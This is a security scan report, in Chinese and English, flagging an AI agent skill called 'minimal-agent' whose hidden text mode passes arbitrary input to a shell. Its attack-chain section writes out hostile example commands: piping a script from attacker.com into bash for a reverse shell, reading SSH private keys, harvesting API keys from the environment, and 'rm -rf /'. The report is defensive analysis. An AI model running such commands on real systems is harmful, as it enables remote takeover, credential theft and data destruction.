中文 EN

扫描报告

扫描新文件

高风险 — 风险评分 75/100
上次扫描:1 天前 重新扫描
75 /100
minimal-agent
极简 AI 操作系统控制代理(声称)- 实际提供无限制命令执行
Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.
技能名称minimal-agent
分析耗时50.4s
引擎pi
不要安装此技能
DO NOT USE. The skill documents controlled hardware automation but actually enables unrestricted shell execution, arbitrary file operations, and network access with no guardrails. If a restricted OS control agent is needed, implement with explicit tool allowlisting and remove text/V1 mode entirely.

攻击链 7 步

提权 Skill marketed as minimal OS control agent with window management and hardware control
SKILL.md:1
提权 V1/text mode documented as 'development/debugging' feature without emphasizing unrestricted command execution
SKILL.md:65
提权 Attacker forces V1 mode via --text flag or config mode='force_text'
scripts/agent.py:444
提权 execute_raw_command() passes arbitrary input to shell=True subprocess
scripts/agent.py:459
影响 Attacker executes: 'curl https://attacker.com/shell.sh | bash' for reverse shell
scripts/agent.py:459
影响 Attacker executes: 'cat ~/.ssh/id_rsa' to steal SSH keys
scripts/agent.py:459
影响 Attacker executes: 'env | grep API' to harvest credentials
scripts/agent.py:459

安全发现 6 项

严重性 安全发现 位置
严重
Unrestricted Arbitrary Command Execution via V1 Mode 代码执行
The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.
subprocess.run(command_str, shell=True, capture_output=True, text=True, timeout=30)
→ Remove V1/text mode entirely or declare it explicitly in allowed-tools with shell:ADMIN level. The function-calling V2 mode with 55 predefined tools should be the only permitted execution path.
 scripts/agent.py:459
严重
Documentation Mismatch: Claims Minimal Control But Enables Full System Access 文档欺骗
SKILL.md describes this as a '极简 AI 操作系统控制代理' (minimal AI OS control agent) for window management, process control, hardware operations, GUI automation, serial communication, and IoT control. However, the V1 mode documented in SKILL.md enables unrestricted command execution including: file operations, script execution, network operations, database operations, system management, software installation, and security operations.
在 **V1(text)模式** 下,Minimal Agent 可以执行**任何系统命令**
→ Either remove V1 mode entirely or prominently document that this skill can execute arbitrary system commands with full system access.
 SKILL.md:67
高危
Direct Shell Injection via User Input 代码执行
The execute_raw_command() function passes user input directly to shell=True without any sanitization or validation. Commands like 'python agent.py --text "rm -rf /"' would execute immediately.
result = subprocess.run(command_str, shell=True, ...)
→ Implement strict input validation and allowlisting. If arbitrary command execution is truly needed, use shell=False with explicit command/argument separation.
 scripts/agent.py:459
高危
Undeclared Elevated Permissions 权限提升
The skill declares filesystem:WRITE and shell:WRITE, but V1 mode actually provides filesystem:ADMIN and shell:ADMIN equivalent capabilities, enabling: user management, service control, registry editing, firewall configuration, software installation/removal.
系统管理:用户管理、服务控制、注册表编辑
→ Declare the actual permission level (ADMIN) for filesystem and shell resources, or remove these dangerous capabilities.
 SKILL.md:87
中危
Python venv Path Hardcoded with User Home Directory 代码混淆
Line 114 hardcodes 'C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe' which could be leveraged for persistence or DLL hijacking attacks.
PYTHON_VENV = r"C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe"
→ Use relative paths or configurable paths instead of hardcoding absolute paths to user directories.
 scripts/agent.py:114
中危
Potential Environment Variable Access for API Keys 凭证窃取
V1 mode can execute commands like 'env' or 'printenv' to extract API keys, tokens, and other secrets from environment variables. This is not declared in allowed-tools.
shell=True enables access to os.environ
→ If environment variable access is needed, explicitly declare it and implement safeguards against exfiltration.
 scripts/agent.py:459
资源类型声明权限推断权限状态证据
命令执行 WRITE WRITE ✓ 一致 agent.py:run_script() uses subprocess
文件系统 WRITE WRITE ✓ 一致 agent.py + V1 mode enables any file operation
网络访问 READ READ_WRITE ✗ 越权
数据库 NONE WRITE ✗ 越权
环境变量 NONE READ ✗ 越权
技能调用 NONE WRITE ✗ 越权
3 项发现
🔗
中危 外部 URL 外部 URL
https://skillhub.tencent.com/skills/system-controller
SKILL.md:262
🔗
中危 外部 URL 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller
SKILL.md:271
🔗
中危 外部 URL 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip
SKILL.md:275

目录结构

3 文件 · 49.5 KB · 1255 行
Python 1f · 938L Markdown 1f · 293L TOML 1f · 24L
├─ 📁 scripts
│ ├─ 🐍 agent.py Python 938L · 35.9 KB
│ └─ 📄 config.toml TOML 24L · 1.1 KB
└─ 📝 SKILL.md Markdown 293L · 12.5 KB

依赖分析 2 项

包名版本来源已知漏洞备注
subprocess stdlib Python Standard library only
tomllib stdlib Python Standard library only

安全亮点

✓ V2/function-calling mode provides controlled execution with 55 predefined tools
✓ Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
✓ Configuration allows disabling auto mode fallback to V1
✓ Timeout limits (30s) prevent indefinite command execution